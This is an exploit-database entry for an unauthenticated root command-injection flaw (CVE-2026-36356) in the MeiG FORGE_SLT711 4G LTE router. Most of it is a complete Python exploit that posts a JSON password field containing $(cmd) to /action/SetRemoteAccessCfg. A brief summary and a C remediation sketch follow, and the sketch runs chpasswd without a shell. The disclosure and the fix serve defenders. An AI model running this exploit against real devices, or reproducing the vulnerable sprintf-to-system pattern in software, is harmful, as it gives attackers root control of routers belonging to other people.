MeiG Smart FORGE_SLT711 - OS Command Injection

EDB-ID: 52581
CVE: 2026-36356
Author: DANIIL GORDEEV
Type: HARDWARE
Platform: LINUX
Date: 2026-05-27

```python
# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356

"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection

Vuln: JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth: None (endpoint missing from route.txt auth list)
Root: Commands execute as uid=0(root)
Type: Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil

Discovered: 2026-02-21
Tested on: FW MDM9607.LE.1.0-00110-STD.PROD-1
"""

import argparse
import json
import sys
import urllib.request
import urllib.error


def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
    url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
    payload = json.dumps({"password": f"$({cmd})"})

    req = urllib.request.Request(
        url,
        data=payload.encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode()
            data = json.loads(body)
            if data.get("retcode") == 0:
                print(f"[+] retcode:0 — command executed as root")
                return True
            else:
                print(f"[-] Unexpected response: {body}")
                return False
    except urllib.error.URLError as e:
        print(f"[-] Connection failed: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def main():
    p = argparse.ArgumentParser(
        description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
        epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
    )
    p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
    p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
    p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
    args = p.parse_args()

    print(f"[*] Target: {args.ip}:{args.port}")
    print(f"[*] Command: {args.cmd}")
    print(f"[*] Payload: $({{cmd}}) inside password field")

    ok = exploit(args.ip, args.cmd, args.port, args.timeout)
    sys.exit(0 if ok else 1)


if __name__ == "__main__":
    main()
```

A critical OS command injection vulnerability (CVE-2026-36356, CVSS 9.1) exists in the MeiG Smart FORGE_SLT711 4G LTE CPE, allowing unauthenticated remote code execution as root via a crafted JSON payload sent to the `/action/SetRemoteAccessCfg` endpoint. The vulnerability affects firmware version MDM9607.LE.1.0-00110-STD.PROD-1 and likely all firmware versions of this product line. No patch or workaround is detailed in the provided information.
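
The root cause named in the exploit header is a `sprintf("echo root:\"%s\"|chpasswd")` string handed to `system()`. The following is an added remediation sketch, not vendor or exploit-author code, showing the same password change done without a shell so the field is only ever data. The function names, the length policy and the `/usr/sbin/chpasswd` path are assumptions.

```c
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed policy: 8-64 printable ASCII characters. Rejecting control bytes
 * keeps a newline from starting a second "user:password" record. */
int password_ok(const char *pw) {
    size_t n = strlen(pw);
    if (n < 8 || n > 64) return 0;
    for (size_t i = 0; i < n; i++)
        if ((unsigned char)pw[i] < 0x20 || (unsigned char)pw[i] > 0x7e) return 0;
    return 1;
}

/* Build the one record chpasswd reads on stdin; user is a fixed caller string. */
int format_entry(char *out, size_t cap, const char *user, const char *pw) {
    if (!password_ok(pw)) return -1;
    int len = snprintf(out, cap, "%s:%s\n", user, pw);
    return (len < 0 || (size_t)len >= cap) ? -1 : len;
}

/* Run chpasswd directly (no /bin/sh) and feed the record through a pipe.
 * The binary path is an assumption about the firmware layout. */
int set_password(const char *user, const char *pw) {
    char line[128];
    int fds[2], status;
    int len = format_entry(line, sizeof line, user, pw);
    if (len < 0 || pipe(fds) != 0) return -1;
    signal(SIGPIPE, SIG_IGN);            /* a dead child must not kill the daemon */
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        dup2(fds[0], STDIN_FILENO);
        close(fds[0]); close(fds[1]);
        execl("/usr/sbin/chpasswd", "chpasswd", (char *)NULL);
        _exit(127);                      /* exec failed */
    }
    close(fds[0]);
    ssize_t w = write(fds[1], line, (size_t)len);
    close(fds[1]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (w == len && WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

int main(int argc, char **argv) {
    return (argc == 2 && set_password("root", argv[1]) == 0) ? 0 : 1;
}
```

Because no shell parses the value, a string such as `$(...)` is stored as a literal password. The handler still needs to sit behind authentication, since the exploit header notes the endpoint is missing from the `route.txt` auth list.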